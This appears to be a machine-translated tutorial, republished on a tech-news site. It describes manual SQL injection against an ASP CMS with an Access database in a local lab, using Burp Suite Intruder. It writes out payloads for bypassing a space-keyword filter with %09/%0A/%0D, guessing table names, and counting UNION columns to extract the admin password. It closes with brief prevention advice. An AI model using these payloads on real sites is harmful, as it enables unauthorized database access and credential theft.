Shulou(Shulou.com)05/31 Report--

This article is to share with you about the manual SQL injection with the help of Burpsuite's Access database. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Environment introduction

The target system is a CMS system that was accidentally downloaded on the Internet, installed a virtual machine of Windows Server locally, and turned on IIS. Because it is an Access database, you do not need to install the relevant database service, and there is a data.mdb file under the / data folder in its root directory, which is the database file.

Discover the injection point

After taking a look at the site in the test environment, it is found that when this CMS reads news content, URL is in the form of http://172.22.10.239/info.asp?id=240. Conveniently put a single quotation mark after id, but unexpectedly reported a 500th error!

Further confirmation, considering that the id here should be the line number in the database, guess that the possible composition of the relevant query statement should be:

SELECT {col_name} FROM {table_name} WHERE `id` = {id}

The id in the query statement is written in the way of splicing. To prove this conjecture, construct a payload:

? id=240+and+1=1+

The + sign is equivalent to a space in URL. To avoid a problem, the space is replaced with a +.

At this time, it is found that it is still 500. Is it wrong to judge? Or is there any other sentence after it? Unwillingly, I tried or stitching again:

? id=240+or+1=1+

Now the page can be displayed normally. It is almost certain that there is an injection point here, and there is a good chance that the and character has been replaced.

Analysis of problems

Now that you have found the injection point, you can try to inject. The normal way is to try the filtering rules, but because the target is a CMS, we have the background source code, so we directly start to analyze the source code of the relevant pages to see what rules it uses to intercept our input.

Open the info.asp file first and find the place where the id parameter is processed. Line 4 at the beginning is a naked SQL concatenation, and the statement is exactly what we guessed:

What is the rqs () here? The definition of this function is found in the library.asp file:

Str_safe function definition:

See here, in fact, all the rules are clear, we entered {space} and is in the filter list. So the next step is how to bypass and inject.

Try to inject

The difference between ACCESS database and Mysql database injection is mainly reflected in that ACCESS does not have the "total table" of information_schema, that is, the name of the data table can not be read by injection, so it needs to be guessed.

Bypass filtering

You need to bypass the filter before guessing. Because of the convenience of seeing the source code and knowing the principle of filtering, the characters replaced by CMS are all with spaces, such as {spaces} and, select {spaces}, so you need to find a way to bypass spaces.

The first thing that comes to mind is to bypass it in uppercase and lowercase, such as AnD, but it turns out that the argument to the Replace function ends with 1,-1, 1. These three parameters represent the start, end, and check types of replacement characters, respectively. The check type defaults to 0, and when set to 1, it is case-insensitive, so case bypass has no effect.

Then try to use some special characters instead of spaces in a different way. There are some characters other than% 20 and + that can also be recognized as spaces by ACCESS. At this point, you need to use Burpsuite's Intruder tool to try.

Replace the characters to be replaced in the Position interface, of course, replace the space characters according to the rules in the source code, fill in% xx with URL escape, and mark except for'%'. The Attack type in the Intruder tool selects Battering ram so that all tags change synchronously:

In the part of Payload, the type type selects Brute forcer, that is, brute force cracking, and the character set is filled with the character set of HEX, that is, 0per9 ~ 0xFF. The maximum and minimum digits are 2 digits, so you can traverse all the characters of 0x00 ~ 0xFF.

After running the results in an instant, the results are sorted according to the status Status of Response, and the items that are 200are returned to the correct page. At this point, you can initially get the character set that can successfully run out of the result.

In the box are the results of the preliminary screening. The successful execution here does not mean that the space has been successfully replaced, but may have caused other escapes (such as truncation, etc.), so run the filtered characters again with id=240% {xx} and% {xx} 1: 2. Because the number is small, test these Payload again in Simple list mode:

In this result, the return value with a status of 500 indicates that the character was successfully parsed into spaces (because and 1 was injected later and false is expected to be returned). As can also be seen from the results of 200, these two characters can be used as truncation, that is, the following characters will not be parsed as SQL statements.

So it can be determined that the characters currently available to replace spaces are% 09,% 0A,% 0D.

Guess the table name

Because you know the filtering rules and find alternative characters, you can try to guess the table name.

ACCESS does not have a system table that records the name of the data table, so it cannot be read directly like Mysql. The only way is to violently guess the table name.

First build the Payload. Based on the previous step, replace the condition after the AND keyword with a statement that tries to see if the table name exists. The exists keyword is used here to accomplish this task:

EXISTS (SELECT NULL FROM `{Table name}`)

If the table name does not exist, the query returns 500; if the table name exists, the EXISTS function returns True, and the natural page returns 200.

For guesses about table names, there are some lists similar to Top 100s that can be downloaded or blindly guessed. General systems will have tables containing the name admin, with nothing more than a prefix. For example, domestic CMS will like to add the abbreviation of CMS, or the one-letter form such as "t_admin". In this way, you can build a list of guesses according to the characteristics of the target, and use the Intruder tool to import the list of table names into Simple list for brute force cracking.

Here this CMS, because the local source code, opened a hang, directly saw its table name, for example, the administrator table is called CMS_ADMIN.

Carry out injection

Now that everything is ready, all we need is injection. Here you try to use the UNION keyword to get the data you want. You need to know the number of fields in the original query when using the UNION keyword, otherwise you will report a mismatch in the number of columns, and 500 will be returned naturally. The complete SQL query expected to be built is as follows:

SELECT * FROM `cms_ info` WHERE id = 1 UNION SELECT 1 FROM cms_info

Now you need to know how many 1s in UNION need. Try Intruder again, first build an initial payload: id=1%0Dunion%0Dselect%0D1%0Dfrom%0Dcms_info, using% 0D as a substitute for spaces. After inserting the tag, it looks like this:

Here Payload type chooses Character blocks,Min length to be set to 2, which is the length of "1". If we want to try 1-50 columns, just set Max length to 50 * 2 = 100:

Sort the results by Status, and the serial number of the result is 34, so the results of the table queried on the current news page have a total of 35 columns (because you already have UNION SELECT 1 FROM..., at the beginning, so the number of columns here should be + 1).

But although it is 200 here, the page does not return normal data. If you use Repeter to send this data, you will find that you want to jump to the login.asp page:

Then the returned field has the function of controlling the display of the page. The function of each field needs to be judged by modifying the value of the field. Here, there are three different values: 0, 1, and NULL. The specific analysis methods will not be described in detail. Finally get the result of injection, such as reading the administrator account password:

Summary and analysis

Because this injection point has been replaced and some major SQL keywords have been escaped, it is impossible to run out of data directly using SQLMap, so it is viewed by manual injection. In fact, you can also do this automatically by introducing a script into SQLMap, replacing all spaces with% 9D to automatically run out of content (not tried, but feasible in principle).

For ACCESS database, both table name and column name need to be guessed blindly, in fact, it will be very difficult to inject, but for CMS system, table name and field name are public, and general users will not specially modify them when using them, so there will be great hidden dangers once injection points appear.

To prevent SQL injection, such replacement is obviously problematic, and there are still many ways to bypass keyword + space recognition. If you are worried that matching will strictly affect the business, you can also impose local restrictions on the allowed variable types and lengths to reduce the hidden dangers of SQLI.

The above is what manual SQL injection is like with the help of Burpsuite's Access database. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.